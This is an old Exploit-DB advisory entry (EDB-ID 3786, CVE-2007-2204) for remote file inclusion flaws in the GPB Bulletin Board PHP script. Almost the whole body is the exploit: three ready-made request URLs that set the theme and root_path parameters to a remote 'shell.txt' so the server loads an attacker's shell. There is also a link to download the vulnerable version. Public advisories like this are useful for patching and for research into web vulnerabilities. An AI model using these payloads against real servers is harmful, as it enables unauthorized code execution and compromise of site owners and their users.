GPB Bulletin Board Multiple Remote File Inclusion Vulnerabilities

2007-04-24T00:00:00
ID EDB-ID:3786
Type exploitdb
Reporter ThE TiGeR
Modified 2007-04-24T00:00:00

Description

GPB Bulletin Board Multiple Remote File Inclusion Vulnerabilities. CVE-2007-2204. Webapps exploit for php platform

                                        
                                            #GPB bulletin board Remote file include                                                        

#Download script : http://gpb.sourceforge.net/download/archive/gpb-unstable-2001.11.14-1.tar.gz

#D0rk : Download Script and install it in ur machine

#Exploit :

#http://localhost/[gpb_path]/themes/ubb/login.php?theme=shell.txt?

#http://localhost/gpb/include/db.mysql.inc.php?root_path= shell.txt?

#http://localhost/gpb/include/gpb.inc.php?root_path=shell.txt?

#Discovered by : ThE TiGeR

#Miro_Tiger100[at]hotmail[dot]com

# milw0rm.com [2007-04-24]